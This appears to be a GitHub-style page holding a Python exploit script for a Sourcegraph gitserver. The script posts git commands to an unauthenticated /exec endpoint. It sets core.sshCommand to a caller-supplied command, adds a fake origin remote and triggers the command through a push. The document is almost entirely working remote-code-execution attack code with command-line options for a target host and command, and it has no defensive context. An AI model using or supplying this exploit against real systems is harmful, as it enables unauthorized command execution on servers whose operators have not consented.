README.md
Rendering markdown...
import json
import argparse
import requests
def exploit(host, existing_git, cmd):
# setting sshCommand
data = {
"Repo" : existing_git,
"Args" : [
"config",
"core.sshCommand",
cmd
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# setting fake origin
data = {
"Repo" : existing_git,
"Args" : [
"remote",
"add",
"origin",
"git@lolololz:foo/bar.git"
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# triggering command using push
data = {
"Repo" : existing_git,
"Args" : [
"push",
"origin",
"master"
]
}
res = requests.get(host+"/exec", json=data).text
print("[*] Finished executing exploit")
parser = argparse.ArgumentParser()
parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")
parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")
parser.add_argument('--cmd', required=True, help="Command to run")
args = parser.parse_args()
host = args.gitserver_host
existing_git = args.existing_git
cmd = args.cmd
exploit(host, existing_git, cmd)